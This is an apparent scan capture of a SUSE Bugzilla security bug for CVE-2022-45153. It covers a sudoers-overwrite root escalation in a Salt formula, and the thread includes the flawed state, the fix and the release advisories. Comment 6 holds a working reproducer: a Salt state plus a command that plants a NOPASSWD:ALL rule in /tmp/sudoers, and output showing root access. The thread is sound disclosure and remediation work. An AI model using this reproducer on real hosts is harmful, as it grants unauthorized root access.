bugzilla.suse.com
195.135.220.27
Public Scan
URL:
https://bugzilla.suse.com/show_bug.cgi?id=1205990
Submission: On February 27 via api from US — Scanned from DE
Form analysis
6 forms found in the DOM
GET buglist.cgi
<!-- Quick-search form (top of page): submits the "quicksearch" term to buglist.cgi via GET.
     The inline onsubmit handler refuses to submit while the search box is empty. -->
<form method="get" action="buglist.cgi"
      onsubmit="if (this.quicksearch.value == '') { alert('Please enter one or more search terms first.'); return false; } return true;">
  <!-- Hidden flag sent alongside the search term. -->
  <input type="hidden" name="no_redirect" id="no_redirect_top" value="1">
  <script type="text/javascript">
    // When the History API is available, (re)assign the hidden no_redirect flag to 1.
    if (history && history.replaceState) {
      var no_redirect = document.getElementById("no_redirect_top");
      no_redirect.value = 1;
    }
  </script>
  <input type="text" class="txt" name="quicksearch" id="quicksearch_top" title="Quick Search" value="">
  <input type="submit" class="btn" id="find_top" value="Search">
</form>
POST show_bug.cgi?id=1205990
<!-- Compact login form (top of page). It is hidden by default (bz_default_hidden) and
     posts the login name and password back to the bug page.
     NOTE(review): no hidden token input is visible in this captured form; confirm that
     login requests are protected against cross-site request forgery elsewhere, or that
     the capture simply dropped the field. -->
<form id="mini_login_top" class="mini_login bz_default_hidden"
      method="POST" action="show_bug.cgi?id=1205990"
      onsubmit="return check_mini_login_fields( '_top' );">
  <input name="Bugzilla_login" id="Bugzilla_login_top" class="bz_login bz_mini_login_help" title="Login" onfocus="mini_login_on_focus('_top')">
  <!-- Real password field: type="password", initially hidden. -->
  <input type="password" name="Bugzilla_password" id="Bugzilla_password_top" class="bz_password bz_default_hidden" title="Password">
  <!-- Placeholder text box showing the word "password". It carries no name attribute,
       so it is not part of the submitted form data. -->
  <input type="text" id="Bugzilla_password_dummy_top" class="bz_password bz_mini_login_help" value="password" title="Password" onfocus="mini_login_on_focus('_top')">
  <input type="submit" name="GoAheadAndLogIn" id="log_in_top" value="Log in">
  <script type="text/javascript">
    // Strings shared with the mini-login helper functions, which are defined outside this form.
    mini_login_constants = {
      "login": "login",
      "warning": "You must set the login and password before logging in."
    };
    // Gecko, IE and Opera initialise the form as soon as the DOM is ready;
    // every other browser waits for window load plus a 200 ms delay.
    if (YAHOO.env.ua.gecko || YAHOO.env.ua.ie || YAHOO.env.ua.opera) {
      YAHOO.util.Event.onDOMReady(function() {
        init_mini_login_form('_top');
      });
    } else {
      YAHOO.util.Event.on(window, 'load', function() {
        window.setTimeout(function() {
          init_mini_login_form('_top');
        }, 200);
      });
    }
  </script>
  <!-- Dismiss control: hides the mini-login form again. -->
  <a href="#" onclick="return hide_mini_login_form('_top')">[x]</a>
</form>
Name: changeform — POST process_bug.cgi
<form name="changeform" id="changeform" method="post" action="process_bug.cgi">
<input type="hidden" name="delta_ts" value="2023-02-07 10:01:26">
<input type="hidden" name="longdesclength" value="17">
<input type="hidden" name="id" value="1205990">
<input type="hidden" name="token" value="1677513704-MPshWsHf793lx8AhmC2sdY28EjGyeOqXMVTCV8Jy1XQ">
<div class="bz_alias_short_desc_container edit_form">
<a href="show_bug.cgi?id=1205990"><b>Bug 1205990</b></a> -<span id="summary_alias_container"> (<span id="alias_nonedit_display">CVE-2022-45153</span>) <span id="short_desc_nonedit_display">VUL-0: CVE-2022-45153: saphanabootstrap-formula:
Escalation to root for arbitrary users in hana/ha_cluster.sls</span>
</span>
<div id="summary_alias_input" class="bz_default_hidden">
<table id="summary">
<tbody>
<tr>
<td colspan="2">(CVE-2022-45153) </td>
</tr>
<tr>
<th class="field_label " id="field_label_short_desc">
<label for="short_desc" accesskey="s">
<a title="The bug summary is a short sentence which succinctly describes what the bug is about." class="field_help_link" href="page.cgi?id=glossary.html#short_desc">Summary:</a>
</label>
</th>
<td><span title="VUL-0: CVE-2022-45153: saphanabootstrap-formula: Escalation to root for arbitrary users in hana/ha_cluster.sls">VUL-0: CVE-2022-45153: saphanabootstrap-formula: Escalation to root for arbit... </span>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<script type="text/javascript">
hideAliasAndSummary('VUL-0: CVE-2022-45153: saphanabootstrap-formula: Escalation to root for arbitrary users in hana\/ha_cluster.sls', 'CVE-2022-45153');
</script>
<table class="edit_form">
<tbody>
<tr>
<td id="bz_show_bug_column_1" class="bz_show_bug_column">
<table>
<tbody>
<tr>
<th class="field_label">
<a href="page.cgi?id=status_resolution_matrix.html">Status</a>:
</th>
<td id="bz_field_status">
<span id="static_bug_status">NEW </span>
</td>
</tr>
<tr>
<td colspan="2" class="bz_section_spacer"></td>
</tr>
<tr>
<th class="field_label " id="field_label_classification">
<a title="Bugs are categorised into Classifications, Products and Components. classifications is the top-level categorisation." class="field_help_link" href="page.cgi?id=glossary.html#classification">Classification:</a>
</th>
<td class="field_value " id="field_container_classification">Novell Products</td>
</tr>
<tr>
<th class="field_label " id="field_label_product">
<a title="Bugs are categorised into Products and Components. Select a Classification to narrow down this list." class="field_help_link" href="describecomponents.cgi">Product:</a>
</th>
<td class="field_value " id="field_container_product">SUSE Security Incidents</td>
</tr>
<tr class="bz_default_hidden">
<th class="field_label " id="field_label_classification">
<a title="Bugs are categorised into Classifications, Products and Components. classifications is the top-level categorisation." class="field_help_link" href="page.cgi?id=glossary.html#classification">Classification:</a>
</th>
<td class="field_value " id="field_container_classification">Novell Products</td>
</tr>
<tr>
<th class="field_label " id="field_label_component">
<a title="Components are second-level categories; each belongs to a particular Product. Select a Product to narrow down this list." class="field_help_link" href="describecomponents.cgi?product=SUSE Security Incidents">Component:</a>
</th>
<td class="field_value " id="field_container_component">Incidents</td>
</tr>
<tr>
<th class="field_label " id="field_label_version">
<label for="version">
<a title="The version field defines the version of the software the bug was found in." class="field_help_link" href="page.cgi?id=glossary.html#version">Version:</a>
</label>
</th>
<td>unspecified </td>
</tr>
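<!-- Hardware row of the bug field table. The double quotes around the word All inside
     the title attribute are written as &quot; so that they do not end the attribute
     value early. -->
<tr>
  <th class="field_label " id="field_label_rep_platform">
    <label for="rep_platform" accesskey="h">
      <a title="The hardware platform the bug was observed on. Note: When searching, selecting the option &quot;All&quot; only finds bugs whose value for this field is literally the word &quot;All&quot;." class="field_help_link" href="page.cgi?id=glossary.html#rep_platform">Hardware:</a>
    </label>
  </th>
  <td class="field_value">Other Other </td>
</tr>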
<tr>
<td colspan="2" class="bz_section_spacer"></td>
</tr>
<tr>
<th class="field_label">
<label for="priority">
<a href="page.cgi?id=glossary.html#priority">Priority</a></label>:
</th>
<td>P3 - Medium <label for="severity">
<b>Severity</b></label>: Normal </td>
</tr>
<tr>
<th class="field_label">
<label for="target_milestone">
<a href="page.cgi?id=glossary.html#target_milestone">
Target Milestone</a></label>:
</th>
<td>--- </td>
</tr>
<tr>
<th class="field_label">
<a href="page.cgi?id=glossary.html#assigned_to">Assigned To</a>:
</th>
<td><span class="vcard"><span class="fn">Shapbot Shapbotson</span>
</span>
</td>
</tr>
<tr>
<th class="field_label " id="field_label_qa_contact">
<label for="qa_contact" accesskey="q">
<a title="The person responsible for confirming this bug if it is unconfirmed, and for verifying the fix once the bug has been resolved." class="field_help_link" href="page.cgi?id=glossary.html#qa_contact">QA Contact:</a>
</label>
</th>
<td><span class="vcard"><span class="fn">Security Team bot</span>
</span>
</td>
</tr>
<script type="text/javascript">
assignToDefaultOnChange(['product', 'component'], 'security-team\x40suse.de', 'security-team\x40suse.de');
</script>
<tr>
<td colspan="2" class="bz_section_spacer"></td>
</tr>
<tr>
<th class="field_label " id="field_label_bug_file_loc">
<label for="bug_file_loc" accesskey="u">
<a title="Bugs can have a URL associated with them - for example, a pointer to a web site where the problem is seen." class="field_help_link" href="page.cgi?id=glossary.html#bug_file_loc">URL:</a>
</label>
</th>
<td>
<span id="bz_url_input_area">
<a href="https://smash.suse.de/issue/349334/">https://smash.suse.de/issue/349334/</a>
</span>
</td>
</tr>
<tr>
<th class="field_label " id="field_label_status_whiteboard">
<label for="status_whiteboard" accesskey="w">
<a title="Each bug has a free-form single line text entry box for adding tags and status information." class="field_help_link" href="page.cgi?id=glossary.html#status_whiteboard">Whiteboard:</a>
</label>
</th>
<td colspan="2">
<span title="CVSSv3.1:SUSE:CVE-2022-45153:7.8:(AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)">CVSSv3.1:SUSE:CVE-2022-45153:7.8:(AV:... </span>
</td>
</tr>
<tr>
<th class="field_label">
<label for="keywords" accesskey="k">
<a href="describekeywords.cgi"><u>K</u>eywords</a></label>:
</th>
<td class="field_value" colspan="2">
</td>
</tr>
<tr>
<td colspan="2" class="bz_section_spacer"></td>
</tr>
<tr>
<th class="field_label " id="field_label_dependson">
<a title="The bugs listed here must be resolved before this bug can be resolved." class="field_help_link" href="page.cgi?id=glossary.html#dependson">Depends on:</a>
</th>
<td>
<span id="dependson_input_area">
</span>
</td>
</tr>
<tr>
<th class="field_label " id="field_label_blocked">
<a title="This bug must be resolved before the bugs listed in this field can be resolved." class="field_help_link" href="page.cgi?id=glossary.html#blocked">Blocks:</a>
</th>
<td>
<span id="blocked_input_area">
</span>
</td>
</tr>
<tr>
<th> </th>
<td colspan="2" align="left" id="show_dependency_tree_or_graph"> Show dependency <a href="showdependencytree.cgi?id=1205990&hide_resolved=1">tree</a> / <a href="showdependencygraph.cgi?id=1205990">graph</a>
</td>
</tr>
</tbody>
</table>
</td>
<td>
<div class="bz_column_spacer"> </div>
</td>
<td id="bz_show_bug_column_2" class="bz_show_bug_column">
<ul>
<li><a href="tr_new_case.cgi?product=SUSE%20Security%20Incidents&bug=1205990">Create test case</a></li>
</ul>
<ul>
<li><a href="enter_bug.cgi?cloned_bug_id=1205990">Clone This Bug</a></li>
</ul>
<table cellpadding="3" cellspacing="1">
<tbody>
<tr>
<th class="field_label"> Reported: </th>
<td>2022-12-02 15:00 UTC by <span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</td>
</tr>
<tr>
<th class="field_label"> Modified: </th>
<td>2023-02-07 10:01 UTC (<a href="show_activity.cgi?id=1205990">History</a>) </td>
</tr>
<tr>
<th class="field_label">
<label for="newcc" accesskey="a">CC List:</label>
</th>
<td>3 users <span id="cc_edit_area_showhide_container"> (<a href="#" id="cc_edit_area_showhide">show</a>) </span>
<div id="cc_edit_area" class="bz_default_hidden">
<br>
<select id="cc" multiple="multiple" size="5">
<option value="jsegitz">jsegitz</option>
<option value="rfrohl">rfrohl</option>
<option value="steven.stringer">steven.stringer</option>
</select>
</div>
<script type="text/javascript">
hideEditableField('cc_edit_area_showhide_container', 'cc_edit_area', 'cc_edit_area_showhide', '', '');
</script>
</td>
</tr>
<tr>
<td colspan="2" class="bz_section_spacer"></td>
</tr>
<tr>
<th class="field_label " id="field_label_see_also">
<a title="This allows you to refer to bugs in other installations. You can enter a URL to a bug in the 'Add Bug URLs' field to note that that bug is related to this one. You can enter multiple URLs at once by separating them with a comma. You should normally use this field to refer to bugs in other installations. For bugs in this installation, it is better to use the Depends on and Blocks fields." class="field_help_link" href="page.cgi?id=glossary.html#see_also">See Also:</a>
</th>
<td class="field_value " id="field_container_see_also"></td>
</tr>
<tr>
<th class="field_label " id="field_label_cf_foundby">
<a title="A custom Drop Down field in this installation of Bugzilla." class="field_help_link" href="page.cgi?id=glossary.html#cf_foundby">Found By:</a>
</th>
<td class="field_value " id="field_container_cf_foundby" colspan="2">---</td>
</tr>
<tr>
<th class="field_label " id="field_label_cf_nts_priority">
<a title="A custom Free Text field in this installation of Bugzilla." class="field_help_link" href="page.cgi?id=glossary.html#cf_nts_priority">Services Priority:</a>
</th>
<td class="field_value " id="field_container_cf_nts_priority" colspan="2"></td>
</tr>
<tr>
<th class="field_label " id="field_label_cf_biz_priority">
<a title="A custom Free Text field in this installation of Bugzilla." class="field_help_link" href="page.cgi?id=glossary.html#cf_biz_priority">Business Priority:</a>
</th>
<td class="field_value " id="field_container_cf_biz_priority" colspan="2"></td>
</tr>
<tr>
<th class="field_label " id="field_label_cf_blocker">
<a title="A custom Drop Down field in this installation of Bugzilla." class="field_help_link" href="page.cgi?id=glossary.html#cf_blocker">Blocker:</a>
</th>
<td class="field_value " id="field_container_cf_blocker" colspan="2">---</td>
</tr>
<tr>
<th class="field_label bz_hidden_field" id="field_label_cf_marketing_qa_status">
<a title="A custom Drop Down field in this installation of Bugzilla." class="field_help_link" href="page.cgi?id=glossary.html#cf_marketing_qa_status">Marketing QA Status:</a>
</th>
<td class="field_value bz_hidden_field" id="field_container_cf_marketing_qa_status" colspan="2">---</td>
</tr>
<tr>
<th class="field_label bz_hidden_field" id="field_label_cf_it_deployment">
<a title="A custom Drop Down field in this installation of Bugzilla." class="field_help_link" href="page.cgi?id=glossary.html#cf_it_deployment">IT Deployment:</a>
</th>
<td class="field_value bz_hidden_field" id="field_container_cf_it_deployment" colspan="2">---</td>
</tr>
<tr>
<td colspan="2" class="bz_section_spacer"></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td colspan="3">
<hr id="bz_top_half_spacer">
</td>
</tr>
</tbody>
</table>
<table id="bz_big_form_parts" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td>
<script type="text/javascript">
<!--
/**
 * Toggle the visibility of obsolete attachment rows in the attachment table.
 *
 * Flips the 'bz_default_hidden' class on every row marked 'bz_tr_obsolete',
 * updates the label of the clicked link, adds or removes the
 * "&hide_obsolete=1" parameter on the "view_all" link, and scrolls by the
 * change in table height so the page does not appear to jump.
 *
 * @param link  the element whose label is switched between
 *              "Show Obsolete" and "Hide Obsolete"
 * @return false, so an inline onclick handler cancels the default action
 */
function toggle_display(link) {
    var attachmentTable = document.getElementById("attachment_table");
    var viewAllLink = document.getElementById("view_all");
    var hideObsoleteParam = "&hide_obsolete=1";

    // Height before toggling; used afterwards to compensate the scroll position.
    var heightBefore = attachmentTable.offsetHeight;

    var obsoleteRows = YAHOO.util.Dom.getElementsByClassName('bz_tr_obsolete', 'tr', attachmentTable);
    for (var idx = 0; idx < obsoleteRows.length; idx++) {
        bz_toggleClass(obsoleteRows[idx], 'bz_default_hidden');
    }

    // The state of the first obsolete row decides which label and URL to show.
    var nowHidden = YAHOO.util.Dom.hasClass(obsoleteRows[0], 'bz_default_hidden');
    // Only fixed string literals are assigned to innerHTML here.
    link.innerHTML = nowHidden ? "Show Obsolete" : "Hide Obsolete";
    viewAllLink.href = nowHidden
        ? viewAllLink.href + hideObsoleteParam
        : viewAllLink.href.replace(hideObsoleteParam, "");

    // Scroll by the height difference so the window appears not to move.
    window.scrollBy(0, attachmentTable.offsetHeight - heightBefore);
    return false;
}
//
-->
</script>
<br>
<table id="attachment_table" cellspacing="0" cellpadding="4">
<tbody>
<tr id="a0">
<th colspan="2" align="left"> Attachments </th>
</tr>
<tr class="bz_attach_footer">
<td colspan="2">
<a href="attachment.cgi?bugid=1205990&action=enter">Add an attachment</a> (proposed patch, testcase, etc.)
</td>
</tr>
</tbody>
</table>
<br>
<div id="add_comment" class="bz_section_additional_comments">
<table>
<tbody>
<tr>
<td>
<fieldset>
<legend>Note</legend> You need to <a href="show_bug.cgi?id=1205990&GoAheadAndLogIn=1">log in</a> before you can comment on or make changes to this bug.
</fieldset>
</td>
</tr>
</tbody>
</table>
</div>
</td>
<td>
</td>
</tr>
</tbody>
</table>
<div id="comments">
<script src="js/comments.js?1411227336" type="text/javascript">
</script>
<script type="text/javascript">
<!--
/**
 * Append a quoted copy of an existing comment to the `comment' textarea.
 *
 * @param id       comment number; used in the "(In reply to ...)" header and to
 *                 look up the element with id "comment_text_" + id
 * @param real_id  not used by this function
 * @param name     author name inserted into the reply header
 */
function replyToComment(id, real_id, name) {
    var header = "(In reply to " + name + " from comment #" + id + ")\n";

    /* Element holding the original comment text: id="comment_text_N" */
    var sourceElem = document.getElementById('comment_text_' + id);
    var quoted = header + wrapReplyText(getText(sourceElem));

    /* <textarea id="comment"> */
    var commentBox = document.getElementById('comment');
    // The text is assigned through .value, so it is treated as plain text, not markup.
    // Skip the append when the box already holds exactly this reply.
    if (commentBox.value != quoted) {
        commentBox.value += quoted;
    }
    commentBox.focus();
}
//
-->
</script>
<!-- This auto-sizes the comments and positions the collapse/expand links
to the right. -->
<table class="bz_comment_table" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td>
<div id="c0" class="bz_comment bz_first_comment">
<div class="bz_first_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c0">Description</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-02 15:00:41 UTC </span>
</div>
<pre class="bz_comment_text">Problematic code in hana/ha_cluster.sls
48 # Update /etc/sudoers to allow crm operations to the sidadm
# NOTE(review): the staging file below uses a fixed, predictable path under /tmp.
# As this report states, arbitrary users can write /tmp/sudoers before the state runs.
49 {% set tmp_sudoers = '/tmp/sudoers' %}
50 {% set sudoers = '/etc/sudoers' %}
51
# Step 1: copy /etc/sudoers to the staging path, unless /etc/sudoers already
# mentions the <sid>adm user.
# NOTE(review): no "force" is set here; per the Salt file.copy documentation linked
# in this report, an existing /tmp/sudoers is left in place instead of being replaced.
52 sudoers_backup_{{ sap_instance }}:
53 file.copy:
54 - name: {{ tmp_sudoers }}
55 - source: {{ sudoers }}
56 - unless: cat {{ sudoers }} | grep {{ node.sid.lower() }}adm
57 - require:
58 - stop_hana_{{ sap_instance }}
59
# Step 2: append the crm_attribute rule for <sid>adm to the staging file.
60 sudoers_append_{{ sap_instance }}:
61 file.append:
62 - name: {{ tmp_sudoers }}
63 - text: |
64 {{ node.sid.lower() }}adm ALL=(ALL) NOPASSWD: /usr/sbin/crm_attribute -n hana_{{ node.sid.lower() }}_site_srHook_*
65 - require:
66 - sudoers_backup_{{ sap_instance }}
67
# Step 3: syntax-check the staging file with visudo.
# NOTE(review): this validates syntax only; it says nothing about who wrote the
# rules that are already in the file.
68 sudoers_check_{{ sap_instance }}:
69 cmd.run:
70 - name: /usr/sbin/visudo -c -f {{ tmp_sudoers }}
71 - require:
72 - sudoers_append_{{ sap_instance }}
73
# Step 4: copy the staging file over /etc/sudoers.
# NOTE(review): "force: true" replaces /etc/sudoers with whatever the staging file
# contains at this point.
74 sudoers_edit_{{ sap_instance }}:
75 file.copy:
76 - name: {{ sudoers }}
77 - source: {{ tmp_sudoers }}
78 - force: true
79 - require:
80 - sudoers_check_{{ sap_instance }}
81 - stop_hana_{{ sap_instance }}
/tmp/sudoers can be written by arbitrary users. According to
<a href="https://docs.saltproject.io/en/latest/ref/states/all/salt.states.file.html#salt.states.file.copy">https://docs.saltproject.io/en/latest/ref/states/all/salt.states.file.html#salt.states.file.copy</a>
it will not overwrite existing files. I need to reproduce it (don't have a working salt setup ATM), but every user should be able to write an arbitrary sudoers file, place it there, and then this will copy it into /etc
CVE assignment and reproducer next week</pre>
</div>
<div id="c3" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c3">Comment 3</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Steven Stringer</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 10:11:15 UTC </span>
</div>
<pre class="bz_comment_text">This issue has already been corrected and is currently awaiting release
SUSE:SLE-12-SP3:Update = IBS request 283896
SUSE:SLE-15:Update = IBS request 283894
SUSE:SLE-15-SP2:Update = IBS request 283895</pre>
</div>
<div id="c4" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c4">Comment 4</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 12:21:52 UTC </span>
</div>
<pre class="bz_comment_text">Thanks, but please wait with this. This needs a CVE. I'm just reproducing it and then I'll assign a CVE</pre>
</div>
<div id="c5" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c5">Comment 5</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 12:25:08 UTC </span>
</div>
<pre class="bz_comment_text">Please use CVE-2022-45153</pre>
</div>
<div id="c6" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c6">Comment 6</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 12:28:01 UTC </span>
</div>
<pre class="bz_comment_text">Reproducer:
Create stripped down sls file at /usr/share/salt-formulas/states/ha_cluster_exploit.sls
{% set tmp_sudoers = '/tmp/sudoers' %}
{% set sudoers = '/etc/sudoers' %}
sudoers_backup:
file.copy:
- name: {{ tmp_sudoers }}
- source: {{ sudoers }}
- unless: cat {{ sudoers }} | grep adm
sudoers_append:
file.append:
- name: {{ tmp_sudoers }}
- text: |
adm ALL=(ALL) NOPASSWD: /usr/sbin/crm_attribute -n hana__site_srHook_*
- require:
- sudoers_backup
sudoers_check:
cmd.run:
- name: /usr/sbin/visudo -c -f {{ tmp_sudoers }}
- require:
- sudoers_append
sudoers_edit:
file.copy:
- name: {{ sudoers }}
- source: {{ tmp_sudoers }}
- force: true
- require:
- sudoers_check
as user run (change username)
echo 'johannes ALL=(ALL) NOPASSWD:ALL' > /tmp/sudoers
as root:
salt-call --local state.apply ha_cluster_exploit
then as user:
sudo su
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root)</pre>
</div>
<div id="c7" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c7">Comment 7</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 12:29:27 UTC </span>
</div>
<pre class="bz_comment_text">This can't be exploited by a user once the state has run, because /tmp/sudoers stays in place and users can't overwrite it.</pre>
</div>
<div id="c8" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c8">Comment 8</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Steven Stringer</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 13:51:41 UTC </span>
</div>
<pre class="bz_comment_text">(In reply to Johannes Segitz from <a href="show_bug.cgi?id=1205990#c5">comment #5</a>)
<span class="quote">> Please use CVE-2022-45153</span>
Use CVE for what?</pre>
</div>
<div id="c9" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c9">Comment 9</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-05 16:07:40 UTC </span>
</div>
<pre class="bz_comment_text">For the changelog and for tracking this vulnerability internally and externally</pre>
</div>
<div id="c10" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c10">Comment 10</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Steven Stringer</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-15 08:17:18 UTC </span>
</div>
<pre class="bz_comment_text">Here's the new code. A tmp file is no longer used and /etc/sudoers is no longer touched. A new file is created (/etc/sudoers.d/SAPHanaSR). To ensure that the new file doesn't break the sudoers config the command `/usr/sbin/visudo -c -f` is run.
```
# Replacement state: the sudoers rules are rendered from a Jinja template shipped with
# the formula (salt:// source) and written by file.managed, with no staging file in /tmp.
sudoers_create_{{ sap_instance }}:
file.managed:
- source: salt://hana/templates/ha_cluster_sudoers.j2
# NOTE(review): the definition of "sudoers" is not shown in this excerpt; the comment
# text above says the target is /etc/sudoers.d/SAPHanaSR.
- name: {{ sudoers }}
- template: jinja
# The file is owned by root:root with mode 0440.
# NOTE(review): Salt's file state documentation recommends quoting modes that start
# with a zero (for example '0440') so YAML does not read them as integers; confirm.
- user: root
- group: root
- mode: 0440
# check_cmd has visudo validate the newly rendered contents; per the comment text above,
# this is to ensure the new file does not break the sudoers configuration.
- check_cmd: /usr/sbin/visudo -c -f
- require:
- pkg: install_SAPHanaSR
# Values passed to the template when it is rendered.
- context:
sid: {{ node.sid }}
sites: {{ sites }}
sr_hook: {{ sr_hook }}
sr_hook_multi_target: {{ sr_hook_multi_target }}
# NOTE(review): the __slot__ prefix looks like a Salt slot, i.e. file.grep would be
# evaluated when the state runs rather than when the SLS is rendered; confirm.
sr_hook_string: __slot__:salt:file.grep({{ sr_hook }}, "^srHookGen = ").stdout
sustkover_hook: {{ sustkover_hook }}
```
Full file here -> <a href="https://github.com/SUSE/saphanabootstrap-formula/blob/main/hana/ha_cluster.sls">https://github.com/SUSE/saphanabootstrap-formula/blob/main/hana/ha_cluster.sls</a></pre>
</div>
<div id="c11" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c11">Comment 11</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Johannes Segitz</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-15 09:12:10 UTC </span>
</div>
<pre class="bz_comment_text">looks good, thank you</pre>
</div>
<div id="c12" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c12">Comment 12</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Steven Stringer</span>
</span>
</span>
<span class="bz_comment_time"> 2022-12-15 12:08:41 UTC </span>
</div>
<pre class="bz_comment_text">For your reference, I've added the CVE to the changelog and resubmitted the requests into IBS. Here are the request IDs.
SUSE:SLE-12-SP3:Update 286480
SUSE:SLE-15:Update 286481
SUSE:SLE-15-SP2:Update 286479</pre>
</div>
<div id="c14" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c14">Comment 14</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Swamp Workflow Management</span>
</span>
</span>
<span class="bz_comment_time"> 2023-01-02 14:24:43 UTC </span>
</div>
<pre class="bz_comment_text">SUSE-SU-2023:0011-1: An update that solves one vulnerability and has one errata is now available.
Category: security (important)
Bug References: 1185643,1205990
CVE References: CVE-2022-45153
JIRA References:
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP5 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-4.18.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-4.18.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.</pre>
</div>
<div id="c15" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c15">Comment 15</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Swamp Workflow Management</span>
</span>
</span>
<span class="bz_comment_time"> 2023-01-02 14:25:26 UTC </span>
</div>
<pre class="bz_comment_text">SUSE-SU-2023:0010-1: An update that solves one vulnerability and has one errata is now available.
Category: security (important)
Bug References: 1185643,1205990
CVE References: CVE-2022-45153
JIRA References:
Sources used:
SUSE Linux Enterprise Module for SAP Applications 15-SP1 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150000.1.19.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.</pre>
</div>
<div id="c16" class="bz_comment">
<div class="bz_comment_head">
<span class="bz_comment_number">
<a href="show_bug.cgi?id=1205990#c16">Comment 16</a>
</span>
<span class="bz_comment_user">
<span class="vcard"><span class="fn">Swamp Workflow Management</span>
</span>
</span>
<span class="bz_comment_time"> 2023-01-02 14:30:39 UTC </span>
</div>
<pre class="bz_comment_text">SUSE-SU-2023:0009-1: An update that solves one vulnerability and has one errata is now available.
Category: security (important)
Bug References: 1185643,1205990
CVE References: CVE-2022-45153
JIRA References:
Sources used:
openSUSE Leap 15.4 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
openSUSE Leap 15.3 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SUSE Manager Server 4.3 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SUSE Manager Server 4.2 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SAP Applications 15-SP4 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SAP Applications 15-SP3 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SAP Applications 15-SP2 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.</pre>
</div>
</td>
<td>
</td>
</tr>
</tbody>
</table>
</div>
</form>
GET buglist.cgi
<!-- Quick-search form (bottom of page): submits the "quicksearch" term to buglist.cgi via GET.
     The inline onsubmit handler refuses to submit while the search box is empty. -->
<form method="get" action="buglist.cgi"
      onsubmit="if (this.quicksearch.value == '') { alert('Please enter one or more search terms first.'); return false; } return true;">
  <!-- Hidden flag sent alongside the search term. -->
  <input type="hidden" name="no_redirect" id="no_redirect_bottom" value="1">
  <script type="text/javascript">
    // When the History API is available, (re)assign the hidden no_redirect flag to 1.
    if (history && history.replaceState) {
      var no_redirect = document.getElementById("no_redirect_bottom");
      no_redirect.value = 1;
    }
  </script>
